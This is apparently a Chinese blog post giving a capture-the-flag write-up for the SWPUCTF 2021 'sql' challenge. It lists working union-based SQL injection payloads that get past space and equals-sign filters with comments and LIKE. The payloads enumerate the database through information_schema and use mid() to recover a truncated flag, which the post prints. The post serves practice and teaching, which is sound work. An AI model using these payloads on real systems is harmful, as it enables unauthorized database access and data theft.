[SWPUCTF 2021 新生赛]sql

最新推荐文章于 2025-04-29 23:36:40 发布
最新推荐文章于 2025-04-29 23:36:40 发布
阅读量673 收藏 7
点赞数 6
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44833249/article/details/139609708
版权

第一次做sql注入,所以写的较为详细

希望能帮助各位师傅快速熟练sql注入

打开环境,依旧是sql注入,(自己实在不知道过滤了啥)经过看大佬wp知道这题目过滤了等于号,空格,

空格用/**/绕过,等于号用like绕过,其他的没什么区别

Payload:wllm=1’,报错说明存在sql注入,

判断有几列

Payload:wllm=1%27/**/order/**/by/**/4%23,返还错误,把4改成3运行正常

说明有3列

Payload:?wllm=-1%27/**/union/**/select/**/1,2,3/**/%23判断回显位

?wllm=-1%27/**/union/**/select/**/1,2,database()/**/%23查询数据库名

Payload:?wllm=-1%27/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/%27test_db%27%23 查询数据库中的数据表

Payload?wllm=-1%27/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/%27LTLT_flag%27%23 查询LTLT_flag数据表字段

Payload?wllm=-1%27/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23  查询LTLT_flag数据表中flag字段

这里被截断了,一次只能输出20个,这就需要用到mid函数

mid(group_concat(flag),20,20)表示输出flag字段中第二十个字符开始的后二十个字符,所以就可以得出完整的flag

要注意第一张图片和第二张图片的9是重复的,拼接的时候需要删除一个9

即flag:NSSCTF{79696988-b3b9-44f9-b053-03bcdbd173b3}

geotools 判断点线是否相交 用的jar包
03-14
geotools 判断几何要素的交点 当时想到用的GDAL 但是 交点函数返回的对象总是null , 改用 GeoTools 这个库,需要用到jar 到官网上下载,主要是jts-core-1.16.0.jar
geotools-26.1-bin.zip
11-23
GeoTools 26.1:开启地理信息系统开发之旅》 GeoTools是一个开源的Java库,专注于提供地理信息系统(GIS)的功能。这个压缩包“geotools-26.1-bin.zip”包含了GeoTools的26.1版本,是开发者进行GIS应用开发的重要...
基于Geotools的PostGIS原始操作之CQL过滤及按属性名称生成面属性时间-以湖北省地级市行政区划为
夜郎King的博客
04-14 2817
本文的研究主要基于GeotoolsPostGIS的结合,通过本文,读者可以掌握了解CQL查询语言的示用法,同时了解如何基于Geotools根据不同的属性进行样式规则的生成。
使用Geotools读取DEM地形数据实战-以湖南省30米数据为
夜郎King的博客
02-20 4065
本文将开启一场使用 Geotools 读取 DEM 地形数据的实战之旅,深入探索这一过程中的技术要点、实践技巧以及可能遇到的挑战与解决方案。
基于JavaGeoTools的Shapefile矢量数据缩略图生成实践
夜郎King的博客
08-20 1万+
本文主要使用Java语言,讲解如何使用GeoTools这个组件来进行空间Shapefile数据转换成图片,从而实现服务缩略图的功能。文章通过实的模式讲解预览图片的生成,对于在研究Java的服务预览图片生成的同学朋友有一定的参考价值。
基于GeoTools使用JavaFx进行矢量数据可视化实战
夜郎King的博客
08-09 9458
本文以全球各个国家的矢量数据的展示为,重点讲解如何在JavaFx中进行展示,结合GeoTools来进行展示为需求背景。通过本文,会讲解如何将Geotools的地图在JavaFx中进行展示,
基于GeoToolsGIS专题图自适应边界及高宽等比生成实践
夜郎King的博客
03-06 3614
本文将深入探讨基于 GeoTools 实现 GIS 专题图自适应边界及高宽等比生成的实践方法。
Java中基于Geotools对PostGIS数据库的空间查询实践
夜郎King的博客
04-29 2727
深入探讨空间查询实践,从连接配置到复杂空间查询操作,包括点查询、区域范围查询以及空间关系判断等,全方位展示如何在 Java 环境下借助 Geotools 驾驭 PostGIS 数据库,实现高效精准的空间数据检索,为关领域开发者提供实用的技术路径,助力空间数据应用的创新拓展。
Java GIS开发工具包-GeoTools浅谈
热门推荐
夜郎King的博客
08-27 1万+
文章以Java语言为主,围绕着GeoTools的所有模块来介绍,希望对JavaGis的开发者有一定的帮助。本文想从以下几点来介绍,首先介绍GeoTools的官方仓库基本架构,其次介绍Geotools关功能,然后介绍关于Geotools关学术科研进展。
关于GeoTools技术架构知识简介
夜郎King的博客
09-03 8807
本文将重点介绍GeoTools的技术框架,对GeoTools关依赖与功能jar的叙述进行讲解。文章从GeoTools的插件、扩展、XML支持、非GeoTools的官方扩展这几个方面来进行讲解。通过本文的内容,您可以对GeoTools的架构更进一步的熟悉,同时对GeoTools的主要模块更加了解。
使用Java基于Geotools的SLD文件编程式创建与磁盘生成实战
夜郎King的博客
04-19 3103
本文将深入探讨如何使用 Java 语言基于 Geotools 库,通过编程的方式创建 SLD 文件,并将其生成到磁盘上,以便后续地图渲染引擎能够加载并应用这些样式配置。
springboot项目-基于geotools的倾斜摄影大地坐标转自定义投影坐标源码.zip
08-31
springboot项目-基于geotools的倾斜摄影大地坐标转自定义投影坐标源码.zipspringboot项目-基于geotools的倾斜摄影大地坐标转自定义投影坐标源码.zipspringboot项目-基于geotools的倾斜摄影大地坐标转自定义投影坐标...
geotools-23.3
10-09
GIS领域,GeoTools允许开发人员读取、写入操作多种地理空间数据格式,其中包括GeoJSONShapefile这两种常见的矢量数据格式。 GeoJSON是一种轻量级的数据交换格式,用于表示地理空间信息。它基于JavaScript对象...
geotools-23.0-bin.zip
04-23
GeoTools是开源Java库,专为地理信息系统(GIS)提供服务。这个压缩包"geotools-23.0-bin.zip"包含的是GeoTools的23.0版本的SDK,适用于那些希望在Java环境中开发与地理空间数据关的应用程序的开发者。这个离线包...
yolov12分析电路中的电压分布-检测电路性能评估优化+数据集+训练好的模型.zip
06-02
yolov12分析电路中的电压分布-检测电路性能评估优化+数据集+训练好的模型,包含有使用教程 1. 内部包含标注好的目标检测数据集,分别有yolo格式(txt文件)voc格式标签(xml文件), 共132张图像, 已划分好数据集train,val, test,并附有data.yaml文件可直接用于yolov5,v8,v9,v10,v11,v12等算法的训练; 2. yolo目标检测数据集类别名:circuit-voltages(电路电压),包括 GND(地)、IDC(电流源)、IDC_I(电流源I)、R(电阻)、VDC(直流电压)、VDC_I(直流电压I)等 3. yolo项目用途:分析电路中的电压分布,用于电路性能评估优化 4. 可视化参考链接:https://blog.youkuaiyun.com/weixin_51154380/article/details/126395695?spm=1001.2014.3001.5502
毕业生求职面试实用面试技巧资料.zip
06-02
毕业生求职面试实用面试技巧资料.zip
《MySQL数据库笔试题及答案全集》
06-02
《MySQL数据库笔试题及答案全集》
数据库实验报告册.doc
最新发布
06-02
数据库实验报告册.doc
通达信API文档,动态链接库dll,C++源码,C#源码,JAVA源码
06-02
通达信行情API是金融数据提供商通达信(TongDaXin)为开发者金融机构提供的接口服务,用于获取实时及历史的股票、期货、期权等金融市场数据。这个API允许用户在自己的应用程序中集成通达信的数据服务,实现个性化数据分析、交易策略开发等功能。 1. **API基本概念** - **API**:Application Programming Interface,应用程序编程接口,是软件之间交互的一种方式,提供预定义的函数方法,使得其他软件能够调用特定功能。 - **通达信**:国内知名的金融终端软件提供商,提供股票、期货、基金等市场数据,以及交易服务。 2. **通达信API的功能** - **实时行情**:获取股票、期货、期权等市场的实时报价信息,包括最新价、涨跌额、涨跌幅、成交量等。 - **历史数据**:获取历史交易日的K线数据、分时数据、交易量等信息,支持自定义时间段查询。 - **深度数据**:获取买卖盘口的五档报价成交量,有助于分析市场买卖意愿。 - **资讯信息**:获取公告、研报、新闻等市场资讯。 - **交易委托**:通过API进行交易下单、撤单等操作,实现自动化交易。 3. **TdxHqApi** - **TdxHqApi** 是通达信行情API的具体实现,它包含了调用通达信数据服务的各种函数类,如获取股票列表、获取实时行情、获取历史数据等。 - 开发者需要按照API文档的指示,导入TdxHqApi库,然后通过调用应的函数来获取所需数据。 4. **使用步骤** - **安装**:下载并安装通达信API的SDK,通常包括头文件动态链接库。 - **初始化**:在代码中实化API对象,进行连接设置,如服务器地址、端口号等。 - **连接**:连接到通达信服务器,进行身份验证。 - **数据请求**:调用对应的API函数,如`GetS
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值